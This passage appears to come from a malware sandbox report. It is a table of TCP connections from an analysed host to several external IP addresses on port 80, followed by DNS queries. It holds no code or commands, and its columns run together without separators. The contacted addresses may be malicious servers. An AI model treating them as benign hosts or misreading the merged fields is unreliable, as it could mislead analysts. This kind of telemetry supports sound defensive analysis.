                                                                Nov 27, 2024 08:55:08.976085901 CET8049983185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:08.976191998 CET4998380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:08.993829012 CET4998380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:09.113727093 CET8049983185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:10.226185083 CET8049983185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:10.226356983 CET8049983185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:10.226445913 CET4998380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:10.501709938 CET4998380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:11.521661997 CET4999080192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:11.641714096 CET8049990185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:11.641911983 CET4999080192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:11.659991026 CET4999080192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:11.780143023 CET8049990185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:12.937143087 CET8049990185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:12.937212944 CET8049990185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:12.937311888 CET4999080192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:13.173682928 CET4999080192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:14.192763090 CET4999780192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:14.312994957 CET8049997185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:14.313277006 CET4999780192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:14.328850985 CET4999780192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:14.449410915 CET8049997185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:14.449425936 CET8049997185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:15.609050035 CET8049997185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:15.609150887 CET8049997185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:15.611282110 CET4999780192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:15.847841978 CET4999780192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:16.865685940 CET5000380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:16.986175060 CET8050003185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:16.986259937 CET5000380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:16.996102095 CET5000380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:17.116048098 CET8050003185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:18.327203989 CET8050003185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:18.327219009 CET8050003185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:18.327397108 CET5000380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:18.330173969 CET5000380192.168.2.6185.27.134.144
                                                                Nov 27, 2024 08:55:18.450107098 CET8050003185.27.134.144192.168.2.6
                                                                Nov 27, 2024 08:55:23.982042074 CET5000680192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:24.102086067 CET8050006172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:24.107898951 CET5000680192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:24.187865973 CET5000680192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:24.307867050 CET8050006172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:25.328429937 CET8050006172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:25.329098940 CET8050006172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:25.329251051 CET5000680192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:25.706006050 CET5000680192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:26.784035921 CET5000780192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:26.904187918 CET8050007172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:26.904267073 CET5000780192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:26.934150934 CET5000780192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:27.054265976 CET8050007172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:28.174063921 CET8050007172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:28.174990892 CET8050007172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:28.178586960 CET5000780192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:28.439415932 CET5000780192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:29.459873915 CET5000880192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:29.579875946 CET8050008172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:29.587871075 CET5000880192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:29.599221945 CET5000880192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:29.719300985 CET8050008172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:29.719337940 CET8050008172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:30.869734049 CET8050008172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:30.870346069 CET8050008172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:30.870400906 CET5000880192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:31.111133099 CET5000880192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:32.133913994 CET5000980192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:32.253834009 CET8050009172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:32.254204988 CET5000980192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:32.265881062 CET5000980192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:32.385843992 CET8050009172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:33.460850954 CET8050009172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:33.461503029 CET8050009172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:33.466809988 CET5000980192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:33.466809988 CET5000980192.168.2.6172.67.145.234
                                                                Nov 27, 2024 08:55:33.586783886 CET8050009172.67.145.234192.168.2.6
                                                                Nov 27, 2024 08:55:38.844063997 CET5001080192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:38.964724064 CET8050010172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:38.964802027 CET5001080192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:38.984736919 CET5001080192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:39.104706049 CET8050010172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:40.463380098 CET8050010172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:40.464117050 CET8050010172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:40.464204073 CET5001080192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:40.486237049 CET5001080192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:41.566339016 CET5001180192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:41.686306953 CET8050011172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:41.691871881 CET5001180192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:41.763883114 CET5001180192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:41.883898973 CET8050011172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:43.124485016 CET8050011172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:43.124512911 CET8050011172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:43.124581099 CET5001180192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:43.267594099 CET5001180192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:44.427268028 CET5001280192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:44.547177076 CET8050012172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:44.547256947 CET5001280192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:44.569236040 CET5001280192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:44.689306974 CET8050012172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:44.689331055 CET8050012172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:45.943701982 CET8050012172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:45.944235086 CET8050012172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:45.948009968 CET5001280192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:46.079998970 CET5001280192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:47.100380898 CET5001380192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:47.220602989 CET8050013172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:47.220877886 CET5001380192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:47.230771065 CET5001380192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:47.350852966 CET8050013172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:48.702327013 CET8050013172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:48.702573061 CET8050013172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:48.702630043 CET5001380192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:48.707631111 CET5001380192.168.2.6172.67.167.146
                                                                Nov 27, 2024 08:55:48.827528954 CET8050013172.67.167.146192.168.2.6
                                                                Nov 27, 2024 08:55:54.158648014 CET5001480192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:54.278762102 CET8050014154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:54.278929949 CET5001480192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:54.296211958 CET5001480192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:54.416407108 CET8050014154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:55.802009106 CET5001480192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:55.855292082 CET8050014154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:55.855467081 CET8050014154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:55.855473995 CET5001480192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:55.856594086 CET5001480192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:55.922112942 CET8050014154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:55.922214985 CET5001480192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:56.818949938 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:56.938868046 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:56.939021111 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:56.956094027 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:57.249279022 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.471009016 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:58.505959034 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.505985975 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.506011963 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:58.506038904 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:58.591023922 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.591080904 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.489352942 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.610743046 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:59.610939980 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.627667904 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.748486996 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:59.748500109 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.142486095 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:01.189699888 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.189759970 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:01.189857006 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.189908981 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:01.262469053 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.262526035 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.167025089 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.287851095 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:02.287952900 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.297992945 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.418543100 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:03.874685049 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:03.874866009 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:03.874999046 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:03.877856016 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:03.997760057 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:09.327404976 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:09.447407007 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:09.448103905 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:09.463917971 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:09.583956003 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:10.717557907 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:10.717694044 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:10.717750072 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:10.970623970 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:11.991965055 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:12.111979008 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:12.112127066 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:12.127145052 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:12.247159004 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:13.425523043 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:13.425589085 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:13.425645113 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:13.646107912 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.662377119 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.782305956 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:14.782394886 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.802114964 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.922374964 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:14.922890902 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:16.166023970 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:16.166107893 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:16.168442965 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:16.314327002 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.334602118 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.454557896 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:17.456115007 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.466828108 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.586822033 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:18.770761967 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:18.770864964 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:18.770935059 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:18.775660038 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:18.895581007 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:32.732027054 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:32.852140903 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:32.852240086 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:32.873037100 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:32.993100882 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.006324053 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.006381989 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.006572962 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:34.006823063 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.007127047 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:34.377137899 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.396023989 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.517731905 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:35.520107985 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.538594961 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.658591032 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721002102 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721071959 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721112013 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:36.721604109 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721653938 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:37.048721075 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.067290068 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.187422037 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:38.188107014 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.205075979 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.325197935 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:38.325222015 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338416100 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338449955 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338466883 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338499069 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:39.338532925 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:39.723970890 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.742420912 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.862565994 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:40.862642050 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.873210907 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.993180037 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065346003 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065392017 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065407038 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065646887 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:42.066020012 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.068067074 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:42.070724010 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:42.190783978 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:50.035285950 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:50.155344963 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:50.155442953 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:50.172189951 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:50.292216063 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.697618961 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:51.774771929 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.774874926 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.774983883 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:51.774983883 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:51.817643881 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.819631100 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.709042072 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.829227924 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:52.829319954 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.847362041 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.967319965 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.376807928 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:54.440880060 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.440903902 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.441010952 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:54.441010952 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:54.496773005 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.500158072 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.411627054 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.531769991 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:55.539005041 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.554179907 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.674333096 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:55.676035881 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:57.065491915 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:57.113641024 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:57.113708973 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:57.186182022 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:57.186254025 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.083734989 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.203701019 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:58.203910112 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.214248896 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.334281921 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:59.823905945 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:59.823920012 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:59.824151993 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:59.826939106 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:59.946896076 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:57:05.401720047 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:05.521718979 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:05.521881104 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:05.537626028 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:05.657712936 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.048896074 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:07.093499899 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.093514919 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.093566895 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:07.093605995 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:07.168941021 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.168996096 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.069226980 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.189742088 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:08.196127892 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.217842102 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.337991953 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.720988035 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:09.753113985 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.753168106 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:09.753184080 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.753226995 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:09.841042042 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.841108084 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:10.739938974 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:10.860043049 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:10.864264965 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:10.880908966 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:11.001034975 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:11.001076937 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:12.400871038 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:12.400913000 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:12.400971889 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:13.316037893 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:14.333226919 CET5003580192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:14.453541994 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:14.453756094 CET5003580192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:14.465193033 CET5003580192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:14.585241079 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:16.023740053 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:16.023772955 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:16.023931026 CET5003580192.168.2.6156.251.17.224

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 27, 2024 08:53:44.108885050 CET6234153192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:53:44.586126089 CET53623411.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:54:01.005546093 CET5280453192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:54:01.703109980 CET53528041.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:54:16.460041046 CET5156653192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:54:17.454854012 CET5156653192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:54:17.566705942 CET53515661.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:54:17.593024969 CET53515661.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:54:52.662734985 CET5810653192.168.2.61.1.1.1
